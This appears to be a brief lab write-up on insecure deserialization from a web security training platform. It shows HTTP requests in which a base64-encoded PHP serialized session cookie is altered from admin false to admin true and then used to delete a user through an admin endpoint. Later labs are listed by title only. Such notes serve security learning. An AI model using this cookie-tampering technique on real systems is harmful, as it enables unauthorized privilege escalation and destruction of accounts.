labs
Lab - 1: Modifying serialized objects (A)
GET /my-account HTTP/1.1
Host: 0af2008803bc0d5cc0878b8500100022.web-security-academy.net
Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30%3d
...O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}GET /admin/delete?username=carlos HTTP/1.1
Host: 0af2008803bc0d5cc0878b8500100022.web-security-academy.net
Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjoxO30%3d
...Lab - 2: Modifying serialized data types (P)
Lab - 3: Using application functionality to exploit insecure deserialization (P)
Lab - 4: Arbitrary object injection in PHP (P)
Lab - 5: Exploiting Java deserialization with Apache Commons (P)
Last updated